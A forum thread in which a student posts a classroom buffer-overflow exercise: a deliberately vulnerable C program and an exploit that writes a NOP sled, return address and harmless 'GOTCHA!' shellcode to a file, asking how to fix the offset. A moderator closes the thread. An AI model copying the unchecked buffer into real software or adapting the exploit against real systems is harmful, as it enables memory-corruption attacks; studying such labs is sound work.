Offset values and shellcode size.

[DK Lee]

So, I was given with these two codes (vuln.c and exploit.c) my assignment was supposed to describe the programs, explain the purpose of each of the statements, compile them and run the following sequence of commands:


gcc vuln.c -o vuln
gcc exploit.c -o exploit
./exploit


-----supposed to get an output------------
Using Offset: oxbffff310
Shellcode size: 38


--------the output I get------------
Using Offset: 0x836c861c
Shell code Size: 38


-------------then--------------------------
od -t x2 badfile
./vuln


---------------the final output--------------------
GOTCHA!



Here are the codes:
----------------------------------------------
vuln.c
-----------------------------------------------

Code:

#include <stdlib.h>
#include <stdio.h>

int bof ()

{
char buffer [8];
FILE *badfile;
badfile = fopen( "badfile", "r" );
fread(buffer, sizeof ( char ), 1024, badfile );
return 1;
}

int main( int argc, char **argv)
{
bof();
printf("Not gonna do it! \n");
return 1;
}

Code:

#include <stdlib.h>
#include <stdio.h>

int bof ()

{
char buffer [8];
FILE *badfile;
badfile = fopen( "badfile", "r" );
fread(buffer, sizeof ( char ), 1024, badfile );
return 1;
}

int main( int argc, char **argv)
{
bof();
printf("Not gonna do it! \n");
return 1;
}

----------------------------------------------------
exploit.c
----------------------------------------------------

Code:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
 
char shellcode[] =
 
 "\xeb\x16"
 "\x31\xdb"
 "\x31\xd2"
 "\x31\xc0"
 "\x59"
 "\xbb\x01\x00\x00\x00"
 "\xb2\x09"
 "\xb0\x04"
 "\xcd\x80"
 "\xb0\x01"
 "\xcd\x80"
 "\xe8\xe5\xff\xff\xff"
 "GOTCHA!\n"
;
 
#define OFFSET 1500
 
int bof()
{
   char buffer[8];
   strcpy(buffer, "AAAAAAAAA");
   return 1;
}
 
unsigned long get_ESP(void)
{
      __asm__("movl %ESP,%EAX");
}
 
int main(int argc, char **argv)
{
 
  unsigned long addr;
  FILE *badfile;
  char buffer[1024];
 
  addr = get_ESP()+OFFSET;
  fprintf(stderr, "Using Offset: 0x%x\nShell code size: %d\n",
                   addr, sizeof(shellcode) );
 
  memset(&buffer, 0x90, 1024);
 
 
  buffer[12] = addr & 0x000000ff;
  buffer[13] = (addr & 0x0000ff00) >> 8;
  buffer[14] = (addr & 0x00ff0000) >> 16;
  buffer[15] = (addr & 0xff000000) >> 24;
  memcpy( &buffer[ (sizeof(buffer) - sizeof(shellcode)) ],
            shellcode,sizeof(shellcode) );
 
  badfile = fopen("./badfile","w");
  fwrite(buffer,1024,1,badfile);
  fclose(badfile);
 
}

so, I got the output to show the correct shellcode size which is 38, but I couldn't figure a way to change the "Using Offset" value and get "GOTCHA!" when I execute vuln after exploit.

To simply put it, I need to figure out the way I can get the correct "using offset" value.

Thank you and sorry for the long post.

[laserlight]

I understand that this is an academic assignment, but we generally do not discuss these sort of things here so I shall close this thread.